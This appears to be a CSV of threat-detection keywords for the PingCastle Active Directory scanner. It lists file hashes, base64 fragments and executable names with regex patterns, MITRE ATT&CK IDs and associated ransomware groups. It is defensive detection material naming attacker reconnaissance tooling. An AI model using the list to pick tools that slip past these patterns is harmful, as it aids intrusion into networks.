"*532f68e5acaadb28368f0e7f034e132a82e5b8e0aa1288cce4d71f8c4ef3bbba*",".{0,1000}532f68e5acaadb28368f0e7f034e132a82e5b8e0aa1288cce4d71f8c4ef3bbba.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*58905c69879fe708108827034d276893c207432decd282a1495e8752a392fa58*",".{0,1000}58905c69879fe708108827034d276893c207432decd282a1495e8752a392fa58.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*5b26b766b18f4373017a3c7fb5f771673d00e793eedfad822d4cefb7e736fe59*",".{0,1000}5b26b766b18f4373017a3c7fb5f771673d00e793eedfad822d4cefb7e736fe59.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*5db5f0645d51e2e7c8a2a3ee4c66b65f3c4e483716e8106220ff2c3358415596*",".{0,1000}5db5f0645d51e2e7c8a2a3ee4c66b65f3c4e483716e8106220ff2c3358415596.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*6675d7eb9dde349a58343e5a155e9f530eca6b6afd47280f331eeb0523421118*",".{0,1000}6675d7eb9dde349a58343e5a155e9f530eca6b6afd47280f331eeb0523421118.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*6cc029abfa617d77e65ca70717fba6cfb418110e3922728c251aa8150b81e64e*",".{0,1000}6cc029abfa617d77e65ca70717fba6cfb418110e3922728c251aa8150b81e64e.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*6ee1775d22b9392a4cf9f14450eb072ce78799bc81cb82e3c09c8bb68542cfab*",".{0,1000}6ee1775d22b9392a4cf9f14450eb072ce78799bc81cb82e3c09c8bb68542cfab.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*70d2b7f5e3ca6061206e54786b04143fc5154eab4feaf854797aee3f523d5175*",".{0,1000}70d2b7f5e3ca6061206e54786b04143fc5154eab4feaf854797aee3f523d5175.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*7218d911d8644674912e3871b6dae46af2272b63f2979d121db86f8e03ca395c*",".{0,1000}7218d911d8644674912e3871b6dae46af2272b63f2979d121db86f8e03ca395c.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*743e73b664ae59c68042364849629ca96fe81d3cba0e48e4e7f4f30e71d04f32*",".{0,1000}743e73b664ae59c68042364849629ca96fe81d3cba0e48e4e7f4f30e71d04f32.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*74a4277e37419fd55a972cbaf18d6cb1334c544346c698f3eb59c23cd2e3e82a*",".{0,1000}74a4277e37419fd55a972cbaf18d6cb1334c544346c698f3eb59c23cd2e3e82a.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*7585ced4ace610e2b5ca199838a277d6eed393bf4ad7bbf687ded696e67399f8*",".{0,1000}7585ced4ace610e2b5ca199838a277d6eed393bf4ad7bbf687ded696e67399f8.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*7585ced4ace610e2b5ca199838a277d6eed393bf4ad7bbf687ded696e67399f8*",".{0,1000}7585ced4ace610e2b5ca199838a277d6eed393bf4ad7bbf687ded696e67399f8.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*7749b3c203617b95dce12ca8a044e5206e585a2f010c011ee87d7251fb1d0a4b*",".{0,1000}7749b3c203617b95dce12ca8a044e5206e585a2f010c011ee87d7251fb1d0a4b.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*7a7a44335289a4612f0dd903745b49853c0f8f53dcca01306d5d45ca1611a2df*",".{0,1000}7a7a44335289a4612f0dd903745b49853c0f8f53dcca01306d5d45ca1611a2df.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*7cb8360009c9ee1fab996e446a5d1f2d1540dadb9256c9787f3f30e33aa5e121*",".{0,1000}7cb8360009c9ee1fab996e446a5d1f2d1540dadb9256c9787f3f30e33aa5e121.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*7e09a8fc84665d590659493aa9a832945c6ff9b25bfa87f3bd2aa9636781e87a*",".{0,1000}7e09a8fc84665d590659493aa9a832945c6ff9b25bfa87f3bd2aa9636781e87a.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*7e09a8fc84665d590659493aa9a832945c6ff9b25bfa87f3bd2aa9636781e87a*",".{0,1000}7e09a8fc84665d590659493aa9a832945c6ff9b25bfa87f3bd2aa9636781e87a.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*7e87ed799b7b8ca543691b5f261212cb3efebca5ed03e65ceea4e7dbb405ed34*",".{0,1000}7e87ed799b7b8ca543691b5f261212cb3efebca5ed03e65ceea4e7dbb405ed34.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*806530346d15b80d28b3050b3a6d435025ffef592fa44b9abae471be6f9c0cb8*",".{0,1000}806530346d15b80d28b3050b3a6d435025ffef592fa44b9abae471be6f9c0cb8.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*811db2a2f5deab16fc831dc8ff74172c121e9676a325bd8761fde7a863bcc598*",".{0,1000}811db2a2f5deab16fc831dc8ff74172c121e9676a325bd8761fde7a863bcc598.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*83cafd75fbd94992f38162260fb8cd5f6388c10f4e0b40890554568c43a9fc19*",".{0,1000}83cafd75fbd94992f38162260fb8cd5f6388c10f4e0b40890554568c43a9fc19.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*88e0abfe14884bc8850346e1250c8fd54ee3f2de770f32d3ffecbe06c7769141*",".{0,1000}88e0abfe14884bc8850346e1250c8fd54ee3f2de770f32d3ffecbe06c7769141.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*89e35428319e2e7ec6520f8f828c77e7a94dddf7137b17e0585cd98f5b42be4c*",".{0,1000}89e35428319e2e7ec6520f8f828c77e7a94dddf7137b17e0585cd98f5b42be4c.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*8b6078e8fea18dfd13473f20cd0d7e74f2724d66183d5f44437139d996ec4794*",".{0,1000}8b6078e8fea18dfd13473f20cd0d7e74f2724d66183d5f44437139d996ec4794.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*906b60debb9c88e649118409185663b29d3f29f668ca58de314890743a2c7277*",".{0,1000}906b60debb9c88e649118409185663b29d3f29f668ca58de314890743a2c7277.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*90e1610b1a020875e5d02774f28770a32787cd4379ce184890979e8f241b904d*",".{0,1000}90e1610b1a020875e5d02774f28770a32787cd4379ce184890979e8f241b904d.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*90e1610b1a020875e5d02774f28770a32787cd4379ce184890979e8f241b904d*",".{0,1000}90e1610b1a020875e5d02774f28770a32787cd4379ce184890979e8f241b904d.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*90e1610b1a020875e5d02774f28770a32787cd4379ce184890979e8f241b904d*",".{0,1000}90e1610b1a020875e5d02774f28770a32787cd4379ce184890979e8f241b904d.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*95699dfcbe694396000eeeeb2df293590741f0b912ce5f31c5844b0011407d44*",".{0,1000}95699dfcbe694396000eeeeb2df293590741f0b912ce5f31c5844b0011407d44.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*9bc4890f95874f3f6931e15694b0e7f37f2a7a18daf460ea109fb5f0c8886800*",".{0,1000}9bc4890f95874f3f6931e15694b0e7f37f2a7a18daf460ea109fb5f0c8886800.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*9c5f80d8b37be0d48a0c13a3838db1455aed0c3e23500ac7d9293bb779544e59*",".{0,1000}9c5f80d8b37be0d48a0c13a3838db1455aed0c3e23500ac7d9293bb779544e59.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*a18c0916da1f5900730a30f152c36bd706cbd1e2f9f8bb042207de5ac3ef8097*",".{0,1000}a18c0916da1f5900730a30f152c36bd706cbd1e2f9f8bb042207de5ac3ef8097.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*a5209d425fa5e65dc69e5187454446b5a035b3762a325b6ba0606fc168041c76*",".{0,1000}a5209d425fa5e65dc69e5187454446b5a035b3762a325b6ba0606fc168041c76.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*a8d276db0a9f5d22cd2757538f19b4fc1e234db045d7355aa656326ae8acece3*",".{0,1000}a8d276db0a9f5d22cd2757538f19b4fc1e234db045d7355aa656326ae8acece3.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*AAASCCVcEQQCADCgAAARAA4AGwABABkAAAABAAFbFgMIAEtcRlwEAAQAEgDm*",".{0,1000}AAASCCVcEQQCADCgAAARAA4AGwABABkAAAABAAFbFgMIAEtcRlwEAAQAEgDm.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#base64","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*AAASCCVcEQQCADCgAAARAA4AGwABABkAAAABAAFbGgMQAAAABgAIQDZbEgDm*",".{0,1000}AAASCCVcEQQCADCgAAARAA4AGwABABkAAAABAAFbGgMQAAAABgAIQDZbEgDm.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#base64","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*ACLScanner.exe*",".{0,1000}ACLScanner\.exe.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ae4825d459669ab8cba5f72cd12b587f7a61d5da96e6e54db1bd8c238bcd83ae*",".{0,1000}ae4825d459669ab8cba5f72cd12b587f7a61d5da96e6e54db1bd8c238bcd83ae.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*ae4825d459669ab8cba5f72cd12b587f7a61d5da96e6e54db1bd8c238bcd83ae*",".{0,1000}ae4825d459669ab8cba5f72cd12b587f7a61d5da96e6e54db1bd8c238bcd83ae.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*aee777ead4791c2d6a5420b0625e7fdea13f6d84dedcaff924a5845df5f4db94*",".{0,1000}aee777ead4791c2d6a5420b0625e7fdea13f6d84dedcaff924a5845df5f4db94.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*b62fddbe045b405c39c6d9252805804619c0551d527b78806f0f71246b87b812*",".{0,1000}b62fddbe045b405c39c6d9252805804619c0551d527b78806f0f71246b87b812.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*bcbede4c733ae4b0abe3657ec35f1917dcbdb680aea8e05431d6fef074b720c2*",".{0,1000}bcbede4c733ae4b0abe3657ec35f1917dcbdb680aea8e05431d6fef074b720c2.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*bcbede4c733ae4b0abe3657ec35f1917dcbdb680aea8e05431d6fef074b720c2*",".{0,1000}bcbede4c733ae4b0abe3657ec35f1917dcbdb680aea8e05431d6fef074b720c2.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*bluekeepscanner.exe*",".{0,1000}bluekeepscanner\.exe.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","","N/A","","",""
"*c5719fe52a801b38f7e30386450f5985a7f378147e00d1392b12b902730f6601*",".{0,1000}c5719fe52a801b38f7e30386450f5985a7f378147e00d1392b12b902730f6601.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*c59f22eb5c115a9c633a0b1ff514787c1ceeca2bf4a660f0232616b3fc8336a7*",".{0,1000}c59f22eb5c115a9c633a0b1ff514787c1ceeca2bf4a660f0232616b3fc8336a7.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*cb5618be68d7de48075061262b531c7dd528274a7537195f33dabdffd48a058d*",".{0,1000}cb5618be68d7de48075061262b531c7dd528274a7537195f33dabdffd48a058d.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*cc45f912feb2ff63f5868a2474716c30c75b0a7bc5be629a26d3b03acbf289f6*",".{0,1000}cc45f912feb2ff63f5868a2474716c30c75b0a7bc5be629a26d3b03acbf289f6.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*cc45f912feb2ff63f5868a2474716c30c75b0a7bc5be629a26d3b03acbf289f6*",".{0,1000}cc45f912feb2ff63f5868a2474716c30c75b0a7bc5be629a26d3b03acbf289f6.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*cce6497c3f06700ee80fbd145bc228aa2016f1d3973e1a22b5d6c1bfbe53a447*",".{0,1000}cce6497c3f06700ee80fbd145bc228aa2016f1d3973e1a22b5d6c1bfbe53a447.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*d21a159ec788b457b98da90633ff963124fe551ff66b86e48635d35175902fa0*",".{0,1000}d21a159ec788b457b98da90633ff963124fe551ff66b86e48635d35175902fa0.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*d21a159ec788b457b98da90633ff963124fe551ff66b86e48635d35175902fa0*",".{0,1000}d21a159ec788b457b98da90633ff963124fe551ff66b86e48635d35175902fa0.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*d3b9e8104fcf67fd9ac71d9cf0bc29d3c870ea60c79ce8b9e9d9bfc1d64c3809*",".{0,1000}d3b9e8104fcf67fd9ac71d9cf0bc29d3c870ea60c79ce8b9e9d9bfc1d64c3809.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
